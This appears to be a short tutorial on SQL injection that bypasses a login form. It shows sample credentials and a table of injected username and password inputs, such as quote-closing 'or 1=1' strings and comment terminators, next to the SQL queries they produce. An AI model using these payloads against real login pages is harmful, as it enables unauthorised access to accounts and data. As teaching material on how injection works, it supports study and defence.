User name | Password |
---|---|
admin | admin |
tom | tom |
ron | ron |
When a user enters a user name and password, a SQL query is created and executed to search on the database to verify them. The above query searches in the users table where name is tom and password is tom. If matching entries are found, the user is authenticated.
In order to bypass this security mechanism, SQL code has to be injected on to the input fields. The code has to be injected in such a way that the SQL statement should generate a valid result upon execution. If the executed SQL query has errors in the syntax, it won't featch a valid result. So filling in random SQL commands and submitting the form will not always result in succesfull authentication.
User name | Password | SQL Query |
---|---|---|
tom | tom | SELECT * FROM users WHERE name=("tom") AND password=("tom") |
tom | ") or 1=("1 | SELECT *
FROM users WHERE name=("tom") AND password=("") OR 1=("1") |
tom | ") or 1=(1)-- - | SELECT *
FROM users WHERE name=("tom") AND password=("") OR 1=(1)-- -") |
") or 1=("1 | ") or 1=("1 | SELECT *
FROM users WHERE name=("") OR 1=("1") AND password=("") OR 1=("1") |
") or 1=("1")-- - | blah | SELECT *
FROM users WHERE name=("") OR 1=("1") -- -") and password=("blah") |